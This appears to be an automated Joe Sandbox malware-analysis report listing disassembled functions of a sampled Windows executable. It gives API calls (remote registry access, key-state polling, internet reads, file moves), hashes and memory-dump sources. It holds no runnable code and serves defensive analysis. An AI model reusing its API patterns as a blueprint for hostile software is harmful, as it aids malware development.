                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4A190B1A04301AFE720DF24C886B2AB7E5AF44714F54885DF9A9DB2D2DB71ED44CB81
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7C10E,?,?), ref: 00C7D415
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D451
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D4C8
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D4FE
                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7C505
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C7C560
                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C7C5C3
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00C7C606
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C7C613
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 826366716-0
                                                                                                                                                                                                                                                                            • Opcode ID: c0a2a76fd25be6cec29110d9ebe9d20b8736e2a242c350bbc8bdd3e5f6ff27f4
                                                                                                                                                                                                                                                                            • Instruction ID: fff6b0eb377dd8ee57bf3c19372ce8408bf56a61241240537bdd5cb02f1ad904
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c0a2a76fd25be6cec29110d9ebe9d20b8736e2a242c350bbc8bdd3e5f6ff27f4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71618171108246AFD714DF14C4D0E2ABBE5FF84308F54859CF59A8B292DB31ED45DB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C5D7CD,?), ref: 00C5E714
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C5D7CD,?), ref: 00C5E72D
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5EAB0: GetFileAttributesW.KERNEL32(?,00C5D840), ref: 00C5EAB1
                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00C5ED8A
                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00C5EDC3
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5EF02
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5EF1A
                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00C5EF67
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9a525719765fb104d17596e9f5a27218a36ca083ed9d1453084d00cce562ee51
                                                                                                                                                                                                                                                                            • Instruction ID: eb7dce2006f1984757bd0d9627c6a650df9f16e223dc5120e87bf8f1659b0259
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a525719765fb104d17596e9f5a27218a36ca083ed9d1453084d00cce562ee51
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85515EB60083849BC728EB90D8919DBB3ECAF85351F40092EF695D3191EF71A6CC975A
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C59534
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32 ref: 00C595A5
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32 ref: 00C59604
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C59677
                                                                                                                                                                                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C596A2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                            • Opcode ID: 616145a6915a981db8eb491a9e4b2a605aaa0c3770cf40d0944614050dd8c0ad
                                                                                                                                                                                                                                                                            • Instruction ID: 2b42875a4bc742462f888a25792cede479c6146f2fc1397f8c97f3c43ea09ecb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 616145a6915a981db8eb491a9e4b2a605aaa0c3770cf40d0944614050dd8c0ad
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D5144B5A00219EFCB10CF68C884AAAB7F9FF89310B158559F91ADB310E730E955CB94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C695F3
                                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00C6961F
                                                                                                                                                                                                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C69677
                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C6969C
                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C696A4
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                            • Opcode ID: b776fadad527b262a3a5ef200527fb60f8703b3a4a7eb8f419d82a77930f4d32
                                                                                                                                                                                                                                                                            • Instruction ID: 0b3fd6f4aa4214b4bea7d7a5f4a4c40ad6714113ef7bfc6f8a0f33297cf449a9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b776fadad527b262a3a5ef200527fb60f8703b3a4a7eb8f419d82a77930f4d32
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58512B35A00219AFCF15DF54C881AADBBF5FF49314F048098E95AAB362CB35ED45CB90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00C7999D
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00C79A2D
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00C79A49
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00C79A8F
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00C79AAF
                                                                                                                                                                                                                                                                              • Part of subcall function 00C0F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00C61A02,?,753CE610), ref: 00C0F9F1
                                                                                                                                                                                                                                                                              • Part of subcall function 00C0F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00C50354,00000000,00000000,?,?,00C61A02,?,753CE610,?,00C50354), ref: 00C0FA18
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 666041331-0
                                                                                                                                                                                                                                                                            • Opcode ID: f703f9f0887fdd7929d3fba95029a95793239dc272a3f436b3536fa273b3a997
                                                                                                                                                                                                                                                                            • Instruction ID: bcdfed9ea6474bd04f937e63b837700f14df14892120e3355b26ffa77b347828
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f703f9f0887fdd7929d3fba95029a95793239dc272a3f436b3536fa273b3a997
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C5136356012099FCB05DF68C485DADBBF0FF09324B14C1A8E91A9B762D731EE86CB91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00C8766B
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,?), ref: 00C87682
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00C876AB
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00C6B5BE,00000000,00000000), ref: 00C876D0
                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00C876FF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                            • Opcode ID: fb6c06cdc6101d21c1b4eabced37871c77796dd75329eeae962e2ac962d2ff14
                                                                                                                                                                                                                                                                            • Instruction ID: 920e5a4d410ffb61fa34c78f858f99c8dc3d7b752e98b47ccd685c55c41e5a87
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb6c06cdc6101d21c1b4eabced37871c77796dd75329eeae962e2ac962d2ff14
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3041B135A08504AFD725AF6CCC48FAA7BA5EB05354F250364F829A72E0F670EE50D758
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                                                            • Opcode ID: a86517ea671585b7a540cdd9c1d9a8aa3821f8bbac6e08cff0c0351610991ef7
                                                                                                                                                                                                                                                                            • Instruction ID: d8da71ca28182904d5dd6d38b5189a6db3e8af17a4f42741d3de94c419d797d8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a86517ea671585b7a540cdd9c1d9a8aa3821f8bbac6e08cff0c0351610991ef7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1841D432A00210AFCB24EF78D881A9DB3E5EF89314F254569E515EB751DB31EE41DB80
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00BF19E1
                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00BF19FE
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00BF1A23
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 00BF1A3D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                            • Opcode ID: 6aba3eb2fcdc3323ba25d347ffeb6d6fdeaacbf9c28e6722123f3c5498ec00df
                                                                                                                                                                                                                                                                            • Instruction ID: b5aa0a64c1e8f7d6d12d38dbd32f0902dd67561959f70b119ada3aefea0f714c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6aba3eb2fcdc3323ba25d347ffeb6d6fdeaacbf9c28e6722123f3c5498ec00df
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1416D71A0414AFFDF15AF68C844BFEB7B4FB05324F20865AE439A3290D7346A54DB91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetInputState.USER32 ref: 00C64310
                                                                                                                                                                                                                                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C64367
                                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00C64390
                                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00C6439A
                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C643AB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2256411358-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3758190ce61f49f930ede3a0e98fe26a50c572630c4cef25c09905d2c4b9bf93
                                                                                                                                                                                                                                                                            • Instruction ID: 6a4d35f855a0060f305b506161a43e1b6c05e91f047ddd375b86ed0a57003fec
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3758190ce61f49f930ede3a0e98fe26a50c572630c4cef25c09905d2c4b9bf93
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B31A370504386DEEB3DDB75D8C9FBA3BA8AB01305F044579E4B2C22B0E7B49985CB25
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C52262
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 00C5230E
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 00C52316
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 00C52327
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00C5232F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                            • Opcode ID: db9dc1f7ca13c34405408de60061f93bd9f98040e9dbe52578d49ea0bdc105ab
                                                                                                                                                                                                                                                                            • Instruction ID: 23947e82014b921ac7f5c5b543e645b228c92c01bc15f132526f1f474a092b17
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db9dc1f7ca13c34405408de60061f93bd9f98040e9dbe52578d49ea0bdc105ab
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A031D375900219EFDB00CFA8CD88BDE3BB5EB05325F004215FD26A72D0C370AA84DB54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00C6CC63,00000000), ref: 00C6D97D
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 00C6D9B4
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,?,00C6CC63,00000000), ref: 00C6D9F9
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C6CC63,00000000), ref: 00C6DA0D
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C6CC63,00000000), ref: 00C6DA37
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                            • Opcode ID: 82a5c82fd7dbdf58036e4691ab229f29112ffa030f6f413eb820fd23b60d7012
                                                                                                                                                                                                                                                                            • Instruction ID: 8527755166799dcd347742dc2b4733915e612cd46ebc0c0887de12834211a145
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82a5c82fd7dbdf58036e4691ab229f29112ffa030f6f413eb820fd23b60d7012
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89314B71A04205EFDB20DFA6D8C4AAEB7F8EF04354B20442EE557D6151DB30AE41AB60
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C861E4
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00C8623C
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C8624E
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C86259
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C862B5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 763830540-0
                                                                                                                                                                                                                                                                            • Opcode ID: 30198edabec76115449f8a8a51003aa290c234197bae32bc3f176910b91e08d6
                                                                                                                                                                                                                                                                            • Instruction ID: 3c245dd201fcde8bdb119d21e1ade4a4c81e525de5ff0ff3fa83750aff9bf7b2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30198edabec76115449f8a8a51003aa290c234197bae32bc3f176910b91e08d6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B62196759002189ADB21EFA4CC84EEE77B9FF05328F104256FA25EB1C4D7709A85DF54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 00C713AE
                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00C713C5
                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C71401
                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 00C7140D
                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 00C71445
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                            • Opcode ID: e641ee9fcdf0aa23fd27315044938344ca7853f7b459ba28ff9e09f2e5a24ccf
                                                                                                                                                                                                                                                                            • Instruction ID: 7fa29b4fd4d942b934297fec83a6851b74fe0813d199a3bb06ef02e43b818800
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e641ee9fcdf0aa23fd27315044938344ca7853f7b459ba28ff9e09f2e5a24ccf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F218136600208AFD714EF65DC88BAEBBF5EF48300B048469F95AD77A1DA70AD44DB94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00C2D146
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C2D169
                                                                                                                                                                                                                                                                              • Part of subcall function 00C23B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C16A79,?,0000015D,?,?,?,?,00C185B0,000000FF,00000000,?,?), ref: 00C23BC5
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C2D18F
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2D1A2
